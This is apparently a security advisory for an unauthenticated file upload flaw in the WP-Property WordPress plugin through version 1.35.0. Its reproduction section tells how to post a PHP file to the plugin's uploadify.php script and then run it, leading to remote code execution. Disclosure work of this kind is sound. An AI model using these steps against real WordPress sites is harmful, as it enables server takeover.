WordPress WP-Property Unauthenticated File Upload Vulnerability Leading to Remote Code Execution
Vulnerability
A file upload vulnerability has been identified in the WP-Property plugin for WordPress, affecting versions through 1.35.0. The issue resides in the third-party 'uploadify.php' script, where an unauthenticated user can upload arbitrary PHP files to a temporary directory. This vulnerability allows for remote code execution on the server.
Impact
Exploitation of this vulnerability allows for arbitrary file upload, which can be leveraged to execute malicious PHP scripts on the server, leading to remote code execution.
Reproduction
To reproduce this vulnerability, upload a PHP file using a POST request to 'wp-content/plugins/wp-property/third-party/uploadify/uploadify.php'. Include the file in the 'Filedata' field and specify the upload directory in the 'folder' field. Once the file is uploaded, it can be accessed via the upload directory URL, executing any PHP code contained within.
Vulnerability Rating
Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.